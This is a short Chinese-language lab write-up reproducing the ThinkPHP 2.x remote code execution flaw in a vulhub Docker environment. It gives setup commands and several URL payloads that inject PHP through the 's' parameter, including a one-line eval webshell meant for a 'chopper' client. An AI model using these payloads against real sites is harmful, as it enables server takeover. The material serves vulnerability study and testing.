[PHP知识库]【ThinkPHP】2.x rce远程命令执行漏洞

我感到难过，不是因为你欺骗了我，而是因为我再也不能相信你了。——尼采

漏洞环境搭建

使用docker搭建vulhub靶场

影响版本

影响Thinkphp 2.x的版本

漏洞复现过程

cd vulhub/thinkphp/2-rce
docker-compose up -d 

浏览器访问

http://192.168.37.128:8080/

漏洞环境搭建完成

确定thinkphp版本，访问一个不存在的web路径

?版本为thinkphp2.1

输入一直的poc进行验证

/index.php?s=/index/index/xxx/${@phpinfo()}   
/index.php?s=a/b/c/${phpinfo()}
/index.php?s=a/b/c/${phpinfo()}/c/d/e/f        //phpinfo敏感文件
/index.php?s=a/b/c/${@print(eval($_POST[1]))}  //此为一句话连菜刀

漏洞复现成功，这是一种手动复现的方式，可以使用 github上的自动化工具检测

地址：GitHub - Lucifer1993/TPscan: 一键ThinkPHP漏洞检测